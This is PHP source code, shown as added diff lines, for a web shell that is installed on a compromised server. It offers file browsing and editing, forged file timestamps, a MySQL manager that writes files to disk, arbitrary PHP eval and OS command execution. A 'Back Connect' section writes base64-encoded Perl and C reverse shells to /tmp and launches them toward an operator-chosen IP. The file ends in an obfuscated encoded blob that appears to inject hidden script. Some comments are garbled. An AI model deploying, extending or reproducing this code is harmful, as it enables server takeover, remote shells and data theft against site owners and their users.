        '); + p('WebRoot'); + if ($view_writable) { + p(' | View All'); + } else { + p(' | View Writable'); + } + p(' | Create Directory | Create File'); + if (IS_WIN && IS_COM) { + $obj = new COM('scripting.filesystemobject'); + if ($obj && is_object($obj)) { + $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); + foreach($obj->Drives as $drive) { + if ($drive->DriveType == 2) { + p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); + } else { + p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); + } + } + } + } + + p('
         FilenameLast modifiedSizeChmod / PermsAction
        0'.$dirdb['filename'].''.$dirdb['mtime'].'--'); + p(''.$dirdb['dirchmod'].' / '); + p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Del | Rename
        =Parent Directory
        '.$filedb['filename'].''.$filedb['mtime'].''.$filedb['size'].''); + p(''.$filedb['filechmod'].' / '); + p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); + p('Down | '); + p('Copy | '); + p('Edit | '); + p('Rename | '); + p('Time'); + p('
        Packing download selected - Delete selected'.$dir_i.' directories / '.$file_i.' files
        '); +}// end dir + +elseif ($action == 'sqlfile') { + if($doing=="mysqlupload"){ + $file = $_FILES['uploadfile']; + $filename = $file['tmp_name']; + if (file_exists($savepath)) { + m('The goal file has already existed'); + } else { + if(!$filename) { + m('Please choose a file'); + } else { + $fp=@fopen($filename,'r'); + $contents=@fread($fp, filesize($filename)); + @fclose($fp); + $contents = bin2hex($contents); + if(!$upname) $upname = $file['name']; + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); + m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); + } + } + } +?> + +'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); + formhead(array('title'=>'MYSQL Information','name'=>'dbinfo')); + makehide('action','sqlfile'); + p('

        '); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBName:'); + makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); + p('

        '); + formfoot(); + p('
        '); + p('

        Upload file

        '); + p('

        This operation the DB user must has FILE privilege

        '); + p('

        Save path(fullpath): Choose a file: Upload

        '); + p('

        Download file

        '); + p('

        File: Download

        '); + makehide('dbhost'); + makehide('dbport'); + makehide('dbuser'); + makehide('dbpass'); + makehide('dbname'); + makehide('charset'); + makehide('doing'); + makehide('action','sqlfile'); + p('
        '); +} + +elseif ($action == 'sqladmin') { + !$dbhost && $dbhost = 'localhost'; + !$dbuser && $dbuser = 'root'; + !$dbport && $dbport = '3306'; + $dbform = ''; + if(isset($dbhost)){ + $dbform .= "\n"; + } + if(isset($dbuser)) { + $dbform .= "\n"; + } + if(isset($dbpass)) { + $dbform .= "\n"; + } + if(isset($dbport)) { + $dbform .= "\n"; + } + if(isset($dbname)) { + $dbform .= "\n"; + } + if(isset($charset)) { + $dbform .= "\n"; + } + + if ($doing == 'backupmysql' && $saveasfile) { + if (!$table) { + m('Please choose the table'); + } else { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $table = array_flip($table); + $fp = @fopen($path,'w'); + if ($fp) { + $result = q('SHOW tables'); + if (!$result) p('

        '.mysql_error().'

        '); + $mysqldata = ''; + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + sqldumptable($currow[0], $fp); + } + } + fclose($fp); + $fileurl = str_replace(SA_ROOT,'',$path); + m('Database has success backup to '.$path.''); + mysql_close(); + } else { + m('Backup failed'); + } + } + } + if ($insert && $insertsql) { + $keystr = $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + if ($val) { + $keystr .= $tmp.$key; + $valstr .= $tmp."'".addslashes($val)."'"; + $tmp = ','; + } + } + if ($keystr && $valstr) { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); + } + } + if ($update && $insertsql && $base64) { + $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + $valstr .= $tmp.$key."='".addslashes($val)."'"; + $tmp = ','; + } + if ($valstr) { + $where = base64_decode($base64); + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); + } + } + if ($doing == 'del' && $base64) { + $where = base64_decode($base64); + $delete_sql = "DELETE FROM $tablename WHERE $where"; + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); + } + + if ($tablename && $doing == 'drop') { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + if (q("DROP TABLE $tablename")) { + m('Drop table of success'); + $tablename = ''; + } else { + m(mysql_error()); + } + } + + $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); + + formhead(array('title'=>'MYSQL Manager')); + makehide('action','sqladmin'); + p('

        '); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); + makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); + p('

        '); + formfoot(); +?> + +'recordlist')); + makehide('doing'); + makehide('action','sqladmin'); + makehide('base64'); + makehide('tablename'); + p($dbform); + formfoot(); + + //-б|и- +|+т + formhead(array('name'=>'setdbname')); + makehide('action','sqladmin'); + p($dbform); + if (!$dbname) { + makehide('dbname'); + } + formfoot(); + + //-б|и#э + formhead(array('name'=>'settable')); + makehide('action','sqladmin'); + p($dbform); + makehide('tablename'); + makehide('page',$page); + makehide('doing'); + formfoot(); + + $cachetables = array(); + $pagenum = 30; + $page = intval($page); + if($page) { + $start_limit = ($page - 1) * $pagenum; + } else { + $start_limit = 0; + $page = 1; + } + if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + //+ё+б- +|+т-+-в + $mysqlver = mysql_get_server_info(); + p('

        MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

        '); + $highver = $mysqlver > '4.1' ? 1 : 0; + + //+ё+б- +|+т + $query = q("SHOW DATABASES"); + $dbs = array(); + $dbs[] = '-- Select a database --'; + while($db = mysql_fetch_array($query)) { + $dbs[$db['Database']] = $db['Database']; + } + makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); + $tabledb = array(); + if ($dbname) { + p('

        '); + p('Current dababase: '.$dbname.''); + if ($tablename) { + p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); + } + p('

        '); + mysql_select_db($dbname); + + $getnumsql = ''; + $runquery = 0; + if ($sql_query) { + $runquery = 1; + } + $allowedit = 0; + if ($tablename && !$sql_query) { + $sql_query = "SELECT * FROM $tablename"; + $getnumsql = $sql_query; + $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; + $allowedit = 1; + } + p('
        '); + p('

        Run SQL query/queries on database '.$dbname.':

        '); + makehide('tablename', $tablename); + makehide('action','sqladmin'); + p($dbform); + p('
        '); + if ($tablename || ($runquery && $sql_query)) { + if ($doing == 'structure') { + $result = q("SHOW COLUMNS FROM $tablename"); + $rowdb = array(); + while($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + foreach ($rowdb as $row) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + } + tbfoot(); + } elseif ($doing == 'insert' || $doing == 'edit') { + $result = q('SHOW COLUMNS FROM '.$tablename); + while ($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + $rs = array(); + if ($doing == 'insert') { + p('

        Insert new line in '.$tablename.' table »

        '); + } else { + p('

        Update record in '.$tablename.' table »

        '); + $where = base64_decode($base64); + $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); + $rs = mysql_fetch_array($result); + } + p(''); + p($dbform); + makehide('action','sqladmin'); + makehide('tablename',$tablename); + p('
        FieldTypeNullKeyDefaultExtra
        '.$row['Field'].''.$row['Type'].''.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' 
        '); + foreach ($rowdb as $row) { + if ($rs[$row['Field']]) { + $value = htmlspecialchars($rs[$row['Field']]); + } else { + $value = ''; + } + $thisbg = bg(); + p(''); + p(''); + } + if ($doing == 'insert') { + p(''); + } else { + p(''); + makehide('base64', $base64); + } + p('
        '.$row['Field'].'
        '.$row['Type'].'
        '); + } else { + $querys = @explode(';',$sql_query); + foreach($querys as $num=>$query) { + if ($query) { + p("

        Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

        "); + switch(qy($query)) + { + case 0: + p('

        Error : '.mysql_error().'

        '); + break; + case 1: + if (strtolower(substr($query,0,13)) == 'select * from') { + $allowedit = 1; + } + if ($getnumsql) { + $tatol = mysql_num_rows(q($getnumsql)); + $multipage = multi($tatol, $pagenum, $page, $tablename); + } + if (!$tablename) { + $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); + $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); + preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); + $tablename = $matches[1][0]; + } + $result = q($query); + p($multipage); + p(''); + p(''); + if ($allowedit) p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + p(""); + } + p(''); + while($mn = @mysql_fetch_assoc($result)){ + $thisbg = bg(); + p(''); + $where = $tmp = $b1 = ''; + foreach($mn as $key=>$inside){ + if ($inside) { + $where .= $tmp.$key."='".addslashes($inside)."'"; + $tmp = ' AND '; + } + $b1 .= ''; + } + $where = base64_encode($where); + if ($allowedit) p(''); + p($b1); + p(''); + unset($b1); + } + tbfoot(); + p($multipage); + break; + case 2: + $ar = mysql_affected_rows(); + p('

        affected rows : '.$ar.'

        '); + break; + } + } + } + } + } else { + $query = q("SHOW TABLE STATUS"); + $table_num = $table_rows = $data_size = 0; + $tabledb = array(); + while($table = mysql_fetch_array($query)) { + $data_size = $data_size + $table['Data_length']; + $table_rows = $table_rows + $table['Rows']; + $table['Data_length'] = sizecount($table['Data_length']); + $table_num++; + $tabledb[] = $table; + } + $data_size = sizecount($data_size); + unset($table); + p('
        Action$name
        $type($len)
        '.html_clean($inside).' Edit | Del
        '); + p(''); + makehide('action','sqladmin'); + p($dbform); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + foreach ($tabledb as $key => $table) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + + p(""); + makehide('doing','backupmysql'); + formfoot(); + p("
        NameRowsData_lengthCreate_timeUpdate_timeEngineCollation
        '.$table['Name'].' [ Insert | Structure | Drop ]'.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].''.$table['Update_time'].''.$table['Engine'].''.$table['Collation'].'
         Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
        Save as file
        "); + fr($query); + } + } + } + tbfoot(); + @mysql_close(); +}//end sql backup + + +elseif ($action == 'backconnect') { + !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; + !$yourport && $yourport = '12345'; + $usedb = array('perl'=>'perl','c'=>'c'); + + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". + "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + + if ($start && $yourip && $yourport && $use){ + if ($use == 'perl') { + cf('/tmp/angel_bc',$back_connect); + $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); + } else { + cf('/tmp/angel_bc.c',$back_connect_c); + $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/angel_bc.c'); + $res = execute("/tmp/angel_bc $yourip $yourport &"); + } + m("Now script try connect to $yourip port $yourport ..."); + } + + formhead(array('title'=>'Back Connect')); + makehide('action','backconnect'); + p('

        '); + p('Your IP:'); + makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); + p('Your Port:'); + makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); + p('Use:'); + makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); + makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); + p('

        '); + formfoot(); +}//end sql backup + +elseif ($action == 'eval') { + $phpcode = trim($phpcode); + if($phpcode){ + if (!preg_match('#<\?#si', $phpcode)) { + $phpcode = ""; + } + eval("?".">$phpcode'Eval PHP Code')); + makehide('action','eval'); + maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); + p('

        Get plugins

        '); + formfooter(); +}//end eval + +elseif ($action == 'editfile') { + if(file_exists($opfile)) { + $fp=@fopen($opfile,'r'); + $contents=@fread($fp, filesize($opfile)); + @fclose($fp); + $contents=htmlspecialchars($contents); + } + formhead(array('title'=>'Create / Edit File')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); + maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); + formfooter(); +}//end editfile + +elseif ($action == 'newtime') { + $opfilemtime = @filemtime($opfile); + //$time = strtotime("$year-$month-$day $hour:$minute:$second"); + $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); + formhead(array('title'=>'Clone file was last modified time')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); + formfooter(); + formhead(array('title'=>'Set last modified')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + p('

        Instead »'); + p('year:'); + makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); + p('month:'); + makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); + p('day:'); + makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); + p('hour:'); + makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); + p('minute:'); + makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); + p('second:'); + makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); + p('

        '); + formfooter(); +}//end newtime + +elseif ($action == 'shell') { + if (IS_WIN && IS_COM) { + if($program && $parameter) { + $shell= new COM('Shell.Application'); + $a = $shell->ShellExecute($program,$parameter); + m('Program run has '.(!$a ? 'success' : 'fail')); + } + !$program && $program = 'c:\windows\system32\cmd.exe'; + !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; + formhead(array('title'=>'Execute Program')); + makehide('action','shell'); + makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); + p('

        '); + makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

        '); + formfoot(); + } + formhead(array('title'=>'Execute Command')); + makehide('action','shell'); + if (IS_WIN && IS_COM) { + $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); + makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); + } + p('

        '); + makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

        '); + formfoot(); + + if ($command) { + p('
        ');
        +		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
        +			$wsh = new COM('WScript.shell');
        +			$exec = $wsh->exec('cmd.exe /c '.$command);
        +			$stdout = $exec->StdOut();
        +			$stroutput = $stdout->ReadAll();
        +			echo $stroutput;
        +		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
        +			$descriptorspec = array(
        +			   0 => array('pipe', 'r'),
        +			   1 => array('pipe', 'w'),
        +			   2 => array('pipe', 'w')
        +			);
        +			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
        +			if (is_resource($process)) {
        +				fwrite($pipes[0], $command."\r\n");
        +				fwrite($pipes[0], "exit\r\n");
        +				fclose($pipes[0]);
        +				while (!feof($pipes[1])) {
        +					echo fgets($pipes[1], 1024);
        +				}
        +				fclose($pipes[1]);
        +				while (!feof($pipes[2])) {
        +					echo fgets($pipes[2], 1024);
        +				}
        +				fclose($pipes[2]);
        +				proc_close($process);
        +			}
        +		} else {
        +			echo(execute($command));
        +		}
        +		p('
        '); + } +}//end shell + +elseif ($action == 'phpenv') { + $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; + $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); + !$dis_func && $dis_func = 'No'; + $info = array( + 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), + 2 => array('Server Domain',$_SERVER['SERVER_NAME']), + 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), + 4 => array('Server OS',PHP_OS), + 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), + 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), + 8 => array('PHP run mode',strtoupper(php_sapi_name())), + 9 => array('The file path',__FILE__), + + 10 => array('PHP Version',PHP_VERSION), + 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), + 12 => array('Safe Mode',getcfg('safe_mode')), + 13 => array('Administrator',$adminmail), + 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), + 15 => array('enable_dl',getcfg('enable_dl')), + 16 => array('display_errors',getcfg('display_errors')), + 17 => array('register_globals',getcfg('register_globals')), + 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), + 19 => array('memory_limit',getcfg('memory_limit')), + 20 => array('post_max_size',getcfg('post_max_size')), + 21 => array('upload_max_filesize',$upsize), + 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), + 23 => array('disable_functions',$dis_func), + ); + + if($phpvarname) { + m($phpvarname .' : '.getcfg($phpvarname)); + } + + formhead(array('title'=>'Server environment')); + makehide('action','phpenv'); + makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); + formfooter(); + + $hp = array(0=> 'Server', 1=> 'PHP'); + for($a=0;$a<2;$a++) { + p('

        '.$hp[$a].' »

        '); + p('
          '); + if ($a==0) { + for($i=1;$i<=9;$i++) { + p('
        • '.$info[$i][0].':'.$info[$i][1].'
        • '); + } + } elseif ($a == 1) { + for($i=10;$i<=23;$i++) { + p('
        • '.$info[$i][0].':'.$info[$i][1].'
        • '); + } + } + p('
        '); + } +}//end phpenv + +else { + m('Undefined Action'); +} + +?> + +
        + + Copyright (C) 2000-2010 SadrazaM All Rights Reserved. +
        + + + +'; + echo $msg; + echo '
        '; +} +function scookie($key, $value, $life = 0, $prefix = 1) { + global $admin, $timestamp, $_SERVER; + $key = ($prefix ? $admin['cookiepre'] : '').$key; + $life = $life ? $life : $admin['cookielife']; + $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; + setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport); +} +function multi($num, $perpage, $curpage, $tablename) { + $multipage = ''; + if($num > $perpage) { + $page = 10; + $offset = 5; + $pages = @ceil($num / $perpage); + if($page > $pages) { + $from = 1; + $to = $pages; + } else { + $from = $curpage - $offset; + $to = $curpage + $page - $offset - 1; + if($from < 1) { + $to = $curpage + 1 - $from; + $from = 1; + if(($to - $from) < $page && ($to - $from) < $pages) { + $to = $page; + } + } elseif($to > $pages) { + $from = $curpage - $pages + $to; + $to = $pages; + if(($to - $from) < $page && ($to - $from) < $pages) { + $from = $pages - $page + 1; + } + } + } + $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); + for($i = $from; $i <= $to; $i++) { + $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; + } + $multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); + $multipage = $multipage ? '

        Pages: '.$multipage.'

        ' : ''; + } + return $multipage; +} +// ||-++ы++ +function loginpage() { +?> + + + Password: + + + +Can not connect to MySQL server'); + exit; + } + if($link && $dbname) { + if (!@mysql_select_db($dbname, $link)) { + p('

        Database selected has error

        '); + exit; + } + } + if($link && mysql_get_server_info() > '4.1') { + if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) { + q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); + } + } + return $link; +} + +// +е|Ї+к-х+++ +function s_array(&$array) { + if (is_array($array)) { + foreach ($array as $k => $v) { + $array[$k] = s_array($v); + } + } else if (is_string($array)) { + $array = stripslashes($array); + } + return $array; +} + +// |х| HTML| -ы +function html_clean($content) { + $content = htmlspecialchars($content); + $content = str_replace("\n", "
        ", $content); + $content = str_replace(" ", "  ", $content); + $content = str_replace("\t", "    ", $content); + return $content; +} + +// +ё+б+и-| +function getChmod($filepath){ + return substr(base_convert(@fileperms($filepath),10,8),-4); +} + +function getPerms($filepath) { + $mode = @fileperms($filepath); + if (($mode & 0xC000) === 0xC000) {$type = 's';} + elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} + elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} + elseif (($mode & 0x8000) === 0x8000) {$type = '-';} + elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} + elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} + elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} + else {$type = '?';} + + $owner['read'] = ($mode & 00400) ? 'r' : '-'; + $owner['write'] = ($mode & 00200) ? 'w' : '-'; + $owner['execute'] = ($mode & 00100) ? 'x' : '-'; + $group['read'] = ($mode & 00040) ? 'r' : '-'; + $group['write'] = ($mode & 00020) ? 'w' : '-'; + $group['execute'] = ($mode & 00010) ? 'x' : '-'; + $world['read'] = ($mode & 00004) ? 'r' : '-'; + $world['write'] = ($mode & 00002) ? 'w' : '-'; + $world['execute'] = ($mode & 00001) ? 'x' : '-'; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} + if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} + if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} + + return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; +} + +function getUser($filepath) { + if (function_exists('posix_getpwuid')) { + $array = @posix_getpwuid(@fileowner($filepath)); + if ($array && is_array($array)) { + return ' / '.$array['name'].'';}} return '';}$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0V